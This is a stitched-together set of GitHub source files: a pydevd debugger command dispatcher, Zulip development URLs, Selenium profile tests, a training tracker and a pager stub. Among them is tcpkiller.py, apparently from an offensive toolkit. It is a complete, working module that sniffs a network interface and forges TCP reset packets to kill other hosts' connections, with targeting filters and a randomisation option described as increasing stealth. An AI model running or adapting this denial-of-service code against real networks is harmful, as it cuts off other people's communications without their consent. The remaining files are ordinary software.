py_db.break_on_caught_exceptions = {}
if len(splitted) >= 5:
if splitted[0] == 'true':
break_on_uncaught = True
else:
break_on_uncaught = False
if splitted[1] == 'true':
break_on_caught = True
else:
break_on_caught = False
if splitted[2] == 'true':
py_db.skip_on_exceptions_thrown_in_same_context = True
else:
py_db.skip_on_exceptions_thrown_in_same_context = False
if splitted[3] == 'true':
py_db.ignore_exceptions_thrown_in_lines_with_ignore_exception = True
else:
py_db.ignore_exceptions_thrown_in_lines_with_ignore_exception = False
if splitted[4] == 'true':
ignore_libraries = True
else:
ignore_libraries = False
for exception_type in splitted[5:]:
exception_type = exception_type.strip()
if not exception_type:
continue
exception_breakpoint = py_db.add_break_on_exception(
exception_type,
condition=None,
expression=None,
notify_on_handled_exceptions=break_on_caught,
notify_on_unhandled_exceptions=break_on_uncaught,
notify_on_first_raise_only=True,
ignore_libraries=ignore_libraries,
)
py_db.on_breakpoints_changed()
else:
sys.stderr.write("Error when setting exception list. Received: %s\n" % (text,))
elif cmd_id == CMD_GET_FILE_CONTENTS:
if not IS_PY3K: # In Python 3, the frame object will have unicode for the file, whereas on python 2 it has a byte-array encoded with the filesystem encoding.
text = text.encode(file_system_encoding)
if os.path.exists(text):
f = open(text, 'r')
try:
source = f.read()
finally:
f.close()
cmd = py_db.cmd_factory.make_get_file_contents(seq, source)
elif cmd_id == CMD_SET_PROPERTY_TRACE:
# Command which receives whether to trace property getter/setter/deleter
# text is feature_state(true/false);disable_getter/disable_setter/disable_deleter
if text != "":
splitted = text.split(';')
if len(splitted) >= 3:
if py_db.disable_property_trace is False and splitted[0] == 'true':
# Replacing property by custom property only when the debugger starts
pydevd_traceproperty.replace_builtin_property()
py_db.disable_property_trace = True
# Enable/Disable tracing of the property getter
if splitted[1] == 'true':
py_db.disable_property_getter_trace = True
else:
py_db.disable_property_getter_trace = False
# Enable/Disable tracing of the property setter
if splitted[2] == 'true':
py_db.disable_property_setter_trace = True
else:
py_db.disable_property_setter_trace = False
# Enable/Disable tracing of the property deleter
if splitted[3] == 'true':
py_db.disable_property_deleter_trace = True
else:
py_db.disable_property_deleter_trace = False
else:
# User hasn't configured any settings for property tracing
pass
elif cmd_id == CMD_ADD_EXCEPTION_BREAK:
# Note that this message has some idiosyncrasies...
#
# notify_on_handled_exceptions can be 0, 1 or 2
# 0 means we should not stop on handled exceptions.
# 1 means we should stop on handled exceptions showing it on all frames where the exception passes.
# 2 means we should stop on handled exceptions but we should only notify about it once.
#
# To ignore_libraries properly, besides setting ignore_libraries to 1, the IDE_PROJECT_ROOTS environment
# variable must be set (so, we'll ignore anything not below IDE_PROJECT_ROOTS) -- this is not ideal as
# the environment variable may not be properly set if it didn't start from the debugger (we should
# create a custom message for that).
#
# There are 2 global settings which can only be set in CMD_SET_PY_EXCEPTION. Namely:
#
# py_db.skip_on_exceptions_thrown_in_same_context
# - If True, we should only show the exception in a caller, not where it was first raised.
#
# py_db.ignore_exceptions_thrown_in_lines_with_ignore_exception
# - If True exceptions thrown in lines with '@IgnoreException' will not be shown.
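# A hypothetical payload (tab-separated; values are illustrative, not from a
# real IDE session):
#   python-ValueError\t<condition>\t<expression>\t2\t1\t1
# would break on ValueError, notifying once per handled raise (2), stopping on
# unhandled raises (1) and skipping library frames (1).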
condition = ""
expression = ""
if text.find('\t') != -1:
try:
exception, condition, expression, notify_on_handled_exceptions, notify_on_unhandled_exceptions, ignore_libraries = text.split('\t', 5)
except:
exception, notify_on_handled_exceptions, notify_on_unhandled_exceptions, ignore_libraries = text.split('\t', 3)
else:
exception, notify_on_handled_exceptions, notify_on_unhandled_exceptions, ignore_libraries = text, 0, 0, 0
condition = condition.replace("@_@NEW_LINE_CHAR@_@", '\n').replace("@_@TAB_CHAR@_@", '\t').strip()
if condition is not None and (len(condition) == 0 or condition == "None"):
condition = None
expression = expression.replace("@_@NEW_LINE_CHAR@_@", '\n').replace("@_@TAB_CHAR@_@", '\t').strip()
if expression is not None and (len(expression) == 0 or expression == "None"):
expression = None
if exception.find('-') != -1:
breakpoint_type, exception = exception.split('-')
else:
breakpoint_type = 'python'
if breakpoint_type == 'python':
exception_breakpoint = py_db.add_break_on_exception(
exception,
condition=condition,
expression=expression,
notify_on_handled_exceptions=int(notify_on_handled_exceptions) > 0,
notify_on_unhandled_exceptions=int(notify_on_unhandled_exceptions) == 1,
notify_on_first_raise_only=int(notify_on_handled_exceptions) == 2,
ignore_libraries=int(ignore_libraries) > 0
)
if exception_breakpoint is not None:
py_db.on_breakpoints_changed()
else:
supported_type = False
plugin = py_db.get_plugin_lazy_init()
if plugin is not None:
supported_type = plugin.add_breakpoint('add_exception_breakpoint', py_db, breakpoint_type, exception)
if supported_type:
py_db.has_plugin_exception_breaks = py_db.plugin.has_exception_breaks()
py_db.on_breakpoints_changed()
elif cmd_id == CMD_REMOVE_EXCEPTION_BREAK:
exception = text
if exception.find('-') != -1:
exception_type, exception = exception.split('-')
else:
exception_type = 'python'
if exception_type == 'python':
try:
cp = py_db.break_on_uncaught_exceptions.copy()
cp.pop(exception, None)
py_db.break_on_uncaught_exceptions = cp
cp = py_db.break_on_caught_exceptions.copy()
cp.pop(exception, None)
py_db.break_on_caught_exceptions = cp
except:
pydev_log.debug("Error while removing exception %s"%sys.exc_info()[0])
else:
supported_type = False
# I.e.: no need to initialize lazy (if we didn't have it in the first place, we can't remove
# anything from it anyways).
plugin = py_db.plugin
if plugin is not None:
supported_type = plugin.remove_exception_breakpoint(py_db, exception_type, exception)
if supported_type:
py_db.has_plugin_exception_breaks = py_db.plugin.has_exception_breaks()
else:
raise NameError(exception_type)
py_db.on_breakpoints_changed(removed=True)
elif cmd_id == CMD_LOAD_SOURCE:
path = text
try:
if not IS_PY3K: # In Python 3, the frame object will have unicode for the file, whereas on python 2 it has a byte-array encoded with the filesystem encoding.
path = path.encode(file_system_encoding)
path = pydevd_file_utils.norm_file_to_server(path)
f = open(path, 'r')
source = f.read()
cmd = py_db.cmd_factory.make_load_source_message(seq, source)
except:
cmd = py_db.cmd_factory.make_error_message(seq, pydevd_tracing.get_exception_traceback_str())
elif cmd_id == CMD_ADD_DJANGO_EXCEPTION_BREAK:
exception = text
plugin = py_db.get_plugin_lazy_init()
if plugin is not None:
plugin.add_breakpoint('add_exception_breakpoint', py_db, 'django', exception)
py_db.has_plugin_exception_breaks = py_db.plugin.has_exception_breaks()
py_db.on_breakpoints_changed()
elif cmd_id == CMD_REMOVE_DJANGO_EXCEPTION_BREAK:
exception = text
# I.e.: no need to initialize lazy (if we didn't have it in the first place, we can't remove
# anything from it anyways).
plugin = py_db.plugin
if plugin is not None:
plugin.remove_exception_breakpoint(py_db, 'django', exception)
py_db.has_plugin_exception_breaks = py_db.plugin.has_exception_breaks()
py_db.on_breakpoints_changed(removed=True)
elif cmd_id == CMD_EVALUATE_CONSOLE_EXPRESSION:
# Command which takes care of the debug console communication
if text != "":
thread_id, frame_id, console_command = text.split('\t', 2)
console_command, line = console_command.split('\t')
if console_command == 'EVALUATE':
int_cmd = InternalEvaluateConsoleExpression(
seq, thread_id, frame_id, line, buffer_output=True)
elif console_command == 'EVALUATE_UNBUFFERED':
int_cmd = InternalEvaluateConsoleExpression(
seq, thread_id, frame_id, line, buffer_output=False)
elif console_command == 'GET_COMPLETIONS':
int_cmd = InternalConsoleGetCompletions(seq, thread_id, frame_id, line)
else:
raise ValueError('Unrecognized command: %s' % (console_command,))
py_db.post_internal_command(int_cmd, thread_id)
elif cmd_id == CMD_RUN_CUSTOM_OPERATION:
# Command which runs a custom operation
if text != "":
try:
location, custom = text.split('||', 1)
except:
sys.stderr.write('Custom operation now needs a || separator. Found: %s\n' % (text,))
raise
thread_id, frame_id, scopeattrs = location.split('\t', 2)
if scopeattrs.find('\t') != -1: # there are attributes beyond scope
scope, attrs = scopeattrs.split('\t', 1)
else:
scope, attrs = (scopeattrs, None)
# : style: EXECFILE or EXEC
# : encoded_code_or_file: file to execute or code
# : fname: name of function to be executed in the resulting namespace
style, encoded_code_or_file, fnname = custom.split('\t', 3)
int_cmd = InternalRunCustomOperation(seq, thread_id, frame_id, scope, attrs,
style, encoded_code_or_file, fnname)
py_db.post_internal_command(int_cmd, thread_id)
elif cmd_id == CMD_IGNORE_THROWN_EXCEPTION_AT:
if text:
replace = 'REPLACE:' # Not all 3.x versions support u'REPLACE:', so, doing workaround.
if not IS_PY3K:
replace = unicode(replace)
if text.startswith(replace):
text = text[8:]
py_db.filename_to_lines_where_exceptions_are_ignored.clear()
if text:
for line in text.split('||'): # Can be bulk-created (one in each line)
filename, line_number = line.split('|')
if not IS_PY3K:
filename = filename.encode(file_system_encoding)
filename = pydevd_file_utils.norm_file_to_server(filename)
if os.path.exists(filename):
lines_ignored = py_db.filename_to_lines_where_exceptions_are_ignored.get(filename)
if lines_ignored is None:
lines_ignored = py_db.filename_to_lines_where_exceptions_are_ignored[filename] = {}
lines_ignored[int(line_number)] = 1
else:
sys.stderr.write('pydev debugger: warning: trying to ignore exception thrown'
' on file that does not exist: %s (will have no effect)\n' % (filename,))
elif cmd_id == CMD_ENABLE_DONT_TRACE:
if text:
true_str = 'true' # Not all 3.x versions support u'str', so, doing workaround.
if not IS_PY3K:
true_str = unicode(true_str)
mode = text.strip() == true_str
pydevd_dont_trace.trace_filter(mode)
elif cmd_id == CMD_PROCESS_CREATED_MSG_RECEIVED:
original_seq = int(text)
event = py_db.process_created_msg_received_events.pop(original_seq, None)
if event:
event.set()
elif cmd_id == CMD_REDIRECT_OUTPUT:
if text:
py_db.enable_output_redirection('STDOUT' in text, 'STDERR' in text)
elif cmd_id == CMD_GET_NEXT_STATEMENT_TARGETS:
thread_id, frame_id = text.split('\t', 1)
int_cmd = InternalGetNextStatementTargets(seq, thread_id, frame_id)
py_db.post_internal_command(int_cmd, thread_id)
elif cmd_id == CMD_SET_PROJECT_ROOTS:
pydevd_utils.set_project_roots(text.split(u'\t'))
elif cmd_id == CMD_THREAD_DUMP_TO_STDERR:
pydevd_utils.dump_threads()
elif cmd_id == CMD_STOP_ON_START:
py_db.stop_on_start = text.strip() in ('True', 'true', '1')
elif cmd_id == CMD_PYDEVD_JSON_CONFIG:
# Expected to receive a json string as:
# {
# 'skip_suspend_on_breakpoint_exception': [<exception names where we should suspend>],
# 'skip_print_breakpoint_exception': [<exception names where we should print>],
# 'multi_threads_single_notification': bool,
# }
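# e.g. a hypothetical payload:
#   {"skip_print_breakpoint_exception": ["NameError"],
#    "multi_threads_single_notification": true}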
msg = json.loads(text.strip())
if 'skip_suspend_on_breakpoint_exception' in msg:
py_db.skip_suspend_on_breakpoint_exception = tuple(
get_exception_class(x) for x in msg['skip_suspend_on_breakpoint_exception'])
if 'skip_print_breakpoint_exception' in msg:
py_db.skip_print_breakpoint_exception = tuple(
get_exception_class(x) for x in msg['skip_print_breakpoint_exception'])
if 'multi_threads_single_notification' in msg:
py_db.multi_threads_single_notification = msg['multi_threads_single_notification']
elif cmd_id == CMD_GET_EXCEPTION_DETAILS:
thread_id = text
t = pydevd_find_thread_by_id(thread_id)
frame = None
if t and not getattr(t, 'pydev_do_not_trace', None):
additional_info = set_additional_thread_info(t)
frame = additional_info.get_topmost_frame(t)
try:
cmd = py_db.cmd_factory.make_get_exception_details_message(seq, thread_id, frame)
finally:
frame = None
t = None
elif cmd_id == CMD_GET_SMART_STEP_INTO_VARIANTS:
thread_id, frame_id, start_line, end_line = text.split('\t', 3)
int_cmd = InternalGetSmartStepIntoVariants(seq, thread_id, frame_id, start_line, end_line)
py_db.post_internal_command(int_cmd, thread_id)
# Powerful DataViewer commands
elif cmd_id == CMD_DATAVIEWER_ACTION:
# format: thread_id\tframe_id\tvar\taction\targs (args themselves tab-separated)
try:
thread_id, frame_id, var, action, args = text.split('\t', 4)
args = args.split('\t')
int_cmd = InternalDataViewerAction(seq, thread_id, frame_id, var, action, args)
py_db.post_internal_command(int_cmd, thread_id)
except:
traceback.print_exc()
elif cmd_id == CMD_TABLE_EXEC:
try:
thread_id, frame_id, init_command, command_type = text.split('\t', 3)
int_cmd = InternalTableCommand(seq, thread_id, frame_id, init_command, command_type)
py_db.post_internal_command(int_cmd, thread_id)
except:
traceback.print_exc()
elif cmd_id == CMD_SET_USER_TYPE_RENDERERS:
try:
type_renderers = parse_set_type_renderers_message(text)
py_db.set_user_type_renderers(type_renderers)
except:
traceback.print_exc()
else:
#I have no idea what this is all about
cmd = py_db.cmd_factory.make_error_message(seq, "unexpected command " + str(cmd_id))
if cmd is not None:
py_db.writer.add_command(cmd)
del cmd
except Exception:
traceback.print_exc()
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
stream = StringIO()
traceback.print_exc(file=stream)
cmd = py_db.cmd_factory.make_error_message(
seq,
"Unexpected exception in process_net_command.\nInitial params: %s. Exception: %s" % (
((cmd_id, seq, text), stream.getvalue())
)
)
py_db.writer.add_command(cmd)
finally:
py_db._main_lock.release()
| {
"content_hash": "e61e4e6e4cf22ac33be6d1035081afb0",
"timestamp": "",
"source": "github",
"line_count": 929,
"max_line_length": 190,
"avg_line_length": 50.70398277717976,
"alnum_prop": 0.5211234714673914,
"repo_name": "JetBrains/intellij-community",
"id": "9fbdedaee9ec005135d1b1687fa5c53d4d65518d",
"size": "47104",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "python/helpers/pydev/_pydevd_bundle/pydevd_process_net_command.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
import binascii
import socket
import struct
import argparse
import sys
import logging
import os
import traceback
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import Ether, IP, IPv6, TCP, sendp, conf, sniff
from random import randint
from capability import *
from colorama import *
from interface import *
def args_error():
print BAD + "Invalid parameters."
def validate_ips(ips):
clean = []
if ips is None or not isinstance(ips, list):
return []
for ip in ips:
if "," in ip:
ips += filter(None, ip.split(","))
else:
try:
socket.inet_aton(ip)
except Exception as e:
print e
print("error: invalid ip address \"%s\", exiting." % ip)
return None
clean.append(ip)
return clean
def is_int(s):
try:
int(s)
return True
except ValueError:
return False
def validate_ports(ports):
clean = []
if ports is not None:
for port in ports:
if "," in port:
ports += port.split(",")
elif "-" in port:
low, high = port.split("-")
if not is_int(low) or not is_int(high):
print("error: invalid port range \"%s\", exiting." % port)
return None
elif not is_int(port):
return None
clean.append(port)
return clean
return []
def validate_args(args):
for arg in ["allow", "allow_source", "allow_destination", "target", "target_source", "target_destination"]:
if arg in args and args[arg] is not None and not validate_ips(args[arg]):
args_error()
for arg in ["allow_port", "allow_source_port", "allow_destination_port", "target_port", "target_source_port", "target_destination_port"]:
if arg in args and args[arg] is not None and not validate_ports(args[arg]):
args_error()
class TCPKiller(Capability):
def __init__(self, core):
super(TCPKiller, self).__init__(core)
self.name = "TCPKiller"
self.core = core
self.options = {
"interface": Option("interface", "eth0", "interface to act upon", True),
"allow": Option("allow", self.core.localIP, "do not attack this ip address's connections, whether it's the source or destination of a packet", False),
"allow_source": Option("allow-source", False, "do not attack this ip address's connections, but only if it's the source of a packet", False),
"allow_destination": Option("destination-source", False, "do not attack this ip address's connections, but only if it's the destination of a packet", False),
"target": Option("target", "0.0.0.0", "actively target given ip address, whether it is the source or destination of a packet", False),
"target_source": Option("target-source", "0.0.0.0", "actively target this ip address, but only if it's the source of a packet", False),
"target_destination": Option("target-destination", "0.0.0.0", "actively target this ip address, but only if it's the destination of a packet", False),
"allow_port": Option("allow-port", None, "do not attack any connections involving this port, whether it's the source or destination of a packet", False),
"allow_source_port": Option("allow-source-port", None, "do not attack any connections involving this port, but only if it's the source of a packet", False),
"allow_destination_port": Option("allow-source-port", None, "do not attack any connections involving this port, but only if it's the destination of a packet", False),
"target_port": Option("target-port", None, "actively target any connections involving these ports whether it is the source or destination of a packet", False),
"target_source_port": Option("target-source-port", None, "actively target any connections involving this port, but only if it's the source", False),
"target_destination_port": Option("target-source-port", None, "actively target any connections involving this port, but only if it's the destination", False),
"noisy": Option("noisy", False, "sends many more packets to attempt connection resets to increase effectiveness", False),
"randomize": Option("randomize", "all", "target only SOME of the matching packets for increased stealthiness", False),
"verbose": Option("verbose", "True", "verbose output", False)
}
self.help_text = INFO + "Forges TCP reset packets to hang up all IPv4 TCP connections"
def setup(self):
args = {}
for opt in self.options:
args[opt] = self.get_value(opt)
self.iface = args["interface"]
self.verbose = args["verbose"]
self.noisy = args["noisy"]
self.randomize = args["randomize"]
self.VERBOSE = False
self.allow = self.allow_src = self.allow_dst = []
self.target = self.target_src = self.target_dst = []
self.allow_ports = self.allow_sport = self.allow_dport = []
self.target_ports = self.target_sport = self.target_dport = []
self.ranges = {}
self.allow = validate_ips(args["allow"])
self.allow_src = validate_ips(args["allow_source"])
self.allow_dst = validate_ips(args["allow_destination"])
self.target = validate_ips(args["target"])
self.target_src = validate_ips(args["target_source"])
self.target_dst = validate_ips(args["target_destination"])
self.allow_ports = validate_ports(args["allow_port"])
self.allow_sport = validate_ports(args["allow_source_port"])
self.allow_dport = validate_ports(args["allow_destination_port"])
self.target_ports = validate_ports(args["target_port"])
self.target_sport = validate_ports(args["target_source_port"])
self.target_dport = validate_ports(args["target_destination_port"])
self.args = args
self.stop_sniffing = False
try:
self.s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
except:
print BAD + "Raw sockets are unavailable on this platform. Exiting."
return None
print("[*] Initialized tcpkiller on %s in %s mode, targeting %s%s. Press Ctrl-C to exit." %(self.iface, ("noisy" if self.noisy else "quiet"), (args["randomize"]), (" with verbosity enabled" if self.verbose else "")))
if self.allow:
print("[*] Allowing all connections involving " + ", ".join(self.allow))
if self.allow_src:
print("[*] Allowing all connections originating from " + ", ".join(self.allow_src))
if self.allow_dst:
print("[*] Allowing all connections coming from " + ", ".join(self.allow_dst))
if self.target:
print("[*] Targeting all connections involving " + ", ".join(self.target))
if self.target_src:
print("[*] Targeting all connections originating from " + ", ".join(self.target_src))
if self.target_dst:
print("[*] Targeting all connections coming from " + ", ".join(self.target_dst))
if self.allow_ports:
print("[*] Allowing all connections involving port(s) " + ", ".join(self.allow_ports))
if self.allow_sport:
print("[*] Allowing all connections with source port(s) " + ", ".join(self.allow_sport))
if self.allow_dport:
print("[*] Allowing all connections with destination port(s) " + ", ".join(self.allow_dport))
if self.target_ports:
print("[*] Targeting all connections involving port(s) " + ", ".join(self.target_ports))
if self.target_sport:
print("[*] Targeting all connections with source port(s) " + ", ".join(self.target_sport))
if self.target_dport:
print("[*] Targeting all connections with destination port(s) " + ", ".join(self.target_dport))
return True
###############################################################
# Packet Handling #
###############################################################
# Given the configured options, decides whether this packet should be ignored (True) or attacked (False)
def ignore_packet(self, packet, proto):
src_ip = packet[proto].src
dst_ip = packet[proto].dst
src_port = packet[TCP].sport
dst_port = packet[TCP].dport
# Target or allow by IP
if (src_ip in self.allow or dst_ip in self.allow) or (src_ip in self.allow_src) or (dst_ip in self.allow_dst):
return True
elif (self.target and (src_ip not in self.target and dst_ip not in self.target)) or (self.target_src and not src_ip in self.target_src) or (self.target_dst and not dst_ip in self.target_dst):
return True
# Target or allow by Port
if (src_port in self.allow_ports or dst_port in self.allow_ports) or (src_port in self.allow_sport) or (dst_port in self.allow_dport):
return True
elif (self.target_ports and (not src_port in self.target_ports and not dst_port in self.target_ports)) or (self.target_sport and not src_port in self.target_sport) or (self.target_dport and not dst_port in self.target_dport):
return True
# Target randomly
if self.randomize == "often" and randint(1, 10) < 2:
return True
elif self.randomize == "half" and randint(1, 10) < 5:
return True
elif self.randomize == "seldom" and randint(1, 10) < 8:
return True
else:
return False
###############################################################
# Scapy #
###############################################################
def send(self, packet):
self.s.send(packet)
def build_packet(self, src_mac, dst_mac, src_ip, dst_ip, src_port, dst_port, seq, proto):
eth = Ether(src=src_mac, dst=dst_mac, type=0x800)
if proto == IP:
ip = IP(src=src_ip, dst=dst_ip)
elif proto == IPv6:
ip = IPv6(src=src_ip, dst=dst_ip)
else:
return str(eth) #if unknown L2 protocol, send back dud ether packet
tcp = TCP(sport=src_port, dport=dst_port, seq=seq, flags="R")
return str(eth/ip/tcp)
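# Note: callback() below forges resets in both directions -- one RST reuses the
# sniffed seq towards the original destination, and a mirrored one reuses the
# sniffed ack towards the source -- so both endpoints drop the session.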
def callback(self, packet):
flags = packet.sprintf("%TCP.flags%")
proto = IP
if IPv6 in packet:
proto = IPv6
if flags == "A" and not self.ignore_packet(packet, proto):
src_mac = packet[Ether].src
dst_mac = packet[Ether].dst
src_ip = packet[proto].src
dst_ip = packet[proto].dst
src_port = packet[TCP].sport
dst_port = packet[TCP].dport
seq = packet[TCP].seq
ack = packet[TCP].ack
if self.verbose:
print("RST from %s:%s (%s) --> %s:%s (%s) w/ %s" % (src_ip, src_port, src_mac, dst_ip, dst_port, dst_mac, ack))
if self.noisy:
self.send(self.build_packet(src_mac, dst_mac, src_ip, dst_ip, src_port, dst_port, seq, proto))
self.send(self.build_packet(dst_mac, src_mac, dst_ip, src_ip, dst_port, src_port, ack, proto))
def stop_cond(self, _):
return self.stop_sniffing
def launch(self):
success = self.setup()
if not success:
return
self.s.bind((self.iface, 0))
conf.sniff_promisc = True
sniff(filter='tcp', prn=self.callback, store=0, stop_filter=self.stop_cond)
| {
"content_hash": "47e812b17bd0e958f44b217a9e8078c7",
"timestamp": "",
"source": "github",
"line_count": 250,
"max_line_length": 233,
"avg_line_length": 47.556,
"alnum_prop": 0.5780132895954243,
"repo_name": "ecthros/pina-colada",
"id": "cbfce865d3f99f1b065aa4eb683b098ca596af9f",
"size": "11912",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "capabilities/dos/tcpkiller.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2322"
},
{
"name": "HTML",
"bytes": "6877"
},
{
"name": "Python",
"bytes": "84605"
}
],
"symlink_target": ""
} |
from django.conf.urls import url
from django.conf import settings
from django.views.generic import TemplateView
import os
from django.views.static import serve
import zerver.views.registration
import zerver.views.auth
import zerver.views.email_log
# These URLs are available only in the development environment
use_prod_static = getattr(settings, 'PIPELINE_ENABLED', False)
static_root = os.path.join(settings.DEPLOY_ROOT, 'prod-static/serve' if use_prod_static else 'static')
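# (i.e. serve the post-pipeline bundle when PIPELINE_ENABLED is set, otherwise
# the raw static/ tree)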
urls = [
# Serve static assets via the Django server
url(r'^static/(?P<path>.*)$', serve, {'document_root': static_root}),
# Serve useful development environment resources (docs, coverage reports, etc.)
url(r'^coverage/(?P<path>.*)$',
serve, {'document_root':
os.path.join(settings.DEPLOY_ROOT, 'var/coverage'),
'show_indexes': True}),
url(r'^node-coverage/(?P<path>.*)$',
serve, {'document_root':
os.path.join(settings.DEPLOY_ROOT, 'var/node-coverage/lcov-report'),
'show_indexes': True}),
url(r'^casper/(?P<path>.*)$',
serve, {'document_root':
os.path.join(settings.DEPLOY_ROOT, 'var/casper'),
'show_indexes': True}),
url(r'^docs/(?P<path>.*)$',
serve, {'document_root':
os.path.join(settings.DEPLOY_ROOT, 'docs/_build/html')}),
# The special no-password login endpoint for development
url(r'^devlogin/$', zerver.views.auth.login_page,
{'template_name': 'zerver/dev_login.html'}, name='zerver.views.auth.login_page'),
# Page for testing email templates
url(r'^emails/$', zerver.views.email_log.email_page),
url(r'^emails/generate/$', zerver.views.email_log.generate_all_emails),
url(r'^emails/clear/$', zerver.views.email_log.clear_emails),
# Listing of useful URLs and various tools for development
url(r'^devtools/$', TemplateView.as_view(template_name='zerver/dev_tools.html')),
# Have easy access for error pages
url(r'^errors/404/$', TemplateView.as_view(template_name='404.html')),
url(r'^errors/5xx/$', TemplateView.as_view(template_name='500.html')),
]
i18n_urls = [
url(r'^confirmation_key/$', zerver.views.registration.confirmation_key),
]
# These are used for voyager development. On a real voyager instance,
# these files would be served by nginx.
if settings.LOCAL_UPLOADS_DIR is not None:
urls += [
url(r'^user_avatars/(?P<path>.*)$', serve,
{'document_root': os.path.join(settings.LOCAL_UPLOADS_DIR, "avatars")}),
]
| {
"content_hash": "fa2ea69339d370091f18963d68a1b359",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 102,
"avg_line_length": 40.888888888888886,
"alnum_prop": 0.65527950310559,
"repo_name": "jackrzhang/zulip",
"id": "341bf81b9d90c86d7e94f7baa515d861f1a46111",
"size": "2576",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "zproject/dev_urls.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "428151"
},
{
"name": "Emacs Lisp",
"bytes": "158"
},
{
"name": "HTML",
"bytes": "660198"
},
{
"name": "JavaScript",
"bytes": "2910049"
},
{
"name": "Pascal",
"bytes": "1113"
},
{
"name": "Perl",
"bytes": "398747"
},
{
"name": "Puppet",
"bytes": "90611"
},
{
"name": "Python",
"bytes": "6065880"
},
{
"name": "Ruby",
"bytes": "249744"
},
{
"name": "Shell",
"bytes": "112340"
},
{
"name": "TypeScript",
"bytes": "9543"
}
],
"symlink_target": ""
} |
import os
import pytest
from selenium.webdriver import FirefoxProfile
from selenium.webdriver.firefox.options import Options
@pytest.fixture(params=['capabilities', 'firefox_profile', 'firefox_options'])
def driver_kwargs(request, driver_kwargs, profile):
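"""Parametrizes three ways of handing the profile to Firefox: via the
moz:firefoxOptions entry in capabilities, via the firefox_profile keyword,
or attached to a firefox Options object."""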
if request.param == 'capabilities':
options = {'profile': profile}
driver_kwargs[request.param].setdefault('moz:firefoxOptions', options)
elif request.param == 'firefox_profile':
driver_kwargs[request.param] = profile
elif request.param == 'firefox_options':
options = Options()
options.profile = profile
driver_kwargs[request.param] = options
driver_kwargs['firefox_profile'] = profile
return driver_kwargs
@pytest.fixture
def profile():
profile = FirefoxProfile()
profile.set_preference('browser.startup.homepage_override.mstone', '')
profile.set_preference('startup.homepage_welcome_url', 'about:')
profile.update_preferences()
return profile
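# The two prefs above suppress Firefox's first-run/welcome page, so a fresh
# session lands on 'about:' -- which is what test_profile_is_used asserts.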
def test_profile_is_used(driver):
assert 'about:' == driver.current_url
def test_profile_is_deleted(driver, profile):
assert os.path.exists(profile.path)
driver.quit()
assert not os.path.exists(profile.path)
| {
"content_hash": "e8bf60412b70c9284ebff2a18ae326c4",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 78,
"avg_line_length": 30.6,
"alnum_prop": 0.7099673202614379,
"repo_name": "DrMarcII/selenium",
"id": "7166ee7dcaacd68c68f471c0474e26cebed21492",
"size": "2012",
"binary": false,
"copies": "12",
"ref": "refs/heads/master",
"path": "py/test/selenium/webdriver/marionette/mn_profile_tests.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ASP",
"bytes": "825"
},
{
"name": "Batchfile",
"bytes": "321"
},
{
"name": "C",
"bytes": "62056"
},
{
"name": "C#",
"bytes": "2761937"
},
{
"name": "C++",
"bytes": "1839569"
},
{
"name": "CSS",
"bytes": "27283"
},
{
"name": "HTML",
"bytes": "1843699"
},
{
"name": "Java",
"bytes": "4573391"
},
{
"name": "JavaScript",
"bytes": "5023504"
},
{
"name": "Makefile",
"bytes": "4655"
},
{
"name": "Objective-C",
"bytes": "4376"
},
{
"name": "Python",
"bytes": "750218"
},
{
"name": "Ragel",
"bytes": "3086"
},
{
"name": "Ruby",
"bytes": "882934"
},
{
"name": "Shell",
"bytes": "2909"
},
{
"name": "XSLT",
"bytes": "1047"
}
],
"symlink_target": ""
} |
from datetime import datetime
from enum import Enum
from math import inf
from typing import Union
class Mode(Enum):
TRAINING = 0
INFER_TRAIN = 1
INFER_VAL = 2
class Tracker:
epoch: int
n_epochs: Union[int, float]
batch: int
n_batches: int
global_batch: int
mode: Mode
start_time: datetime
best_val_accuracy: float
def __new__(cls, *args, **kwargs):
raise RuntimeError(f"{cls} should not be instantiated!")
@staticmethod
def reset(n_epochs: Union[int, float]) -> None:
Tracker.n_epochs = n_epochs
Tracker.epoch = 1
Tracker.global_batch = 1
Tracker.start_time = datetime.now()
Tracker.best_val_accuracy = -inf
@staticmethod
def progress() -> None:
mode = {
Mode.TRAINING: "Training",
Mode.INFER_TRAIN: "Inferring train set",
Mode.INFER_VAL: "Inferring validation set"
}[Tracker.mode]
batch = f"Batch {Tracker.batch} of {Tracker.n_batches}"
elapsed_time = f"Elapsed time {datetime.now() - Tracker.start_time}"
epoch = f"Epoch {Tracker.epoch} of {Tracker.n_epochs}"
if Tracker.mode == Mode.TRAINING:
global_batch = f"Global batch {Tracker.global_batch}"
message = f"{mode} | {epoch} | {batch} | {global_batch} | {elapsed_time}"
else:
message = f"{mode} | {epoch} | {batch} | {elapsed_time}"
print(message)
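# A minimal usage sketch (hypothetical values, not part of the class API):
#   Tracker.reset(n_epochs=10)
#   Tracker.mode, Tracker.batch, Tracker.n_batches = Mode.TRAINING, 1, 100
#   Tracker.progress()
#   # -> Training | Epoch 1 of 10 | Batch 1 of 100 | Global batch 1 | Elapsed time ...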
| {
"content_hash": "8488ffb45bbe4262759a54ea84cb8f15",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 85,
"avg_line_length": 28.88679245283019,
"alnum_prop": 0.5930764206401045,
"repo_name": "googleinterns/out-of-distribution",
"id": "80c7237481e0e51f78fb0342697b66f56ea30193",
"size": "1531",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/misc/train_tracker.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "7285008"
},
{
"name": "Python",
"bytes": "149077"
},
{
"name": "Shell",
"bytes": "293"
}
],
"symlink_target": ""
} |
"""
module documentation
"""
def more(text, numlines=15):
lines = text.splitlines()
while lines:
chunk = lines[:numlines]
lines = lines[numlines:]
for line in chunk:
print(line)
if lines and input('More?') not in ['y', 'Y']:
break
if __name__ == '__main__':
import sys
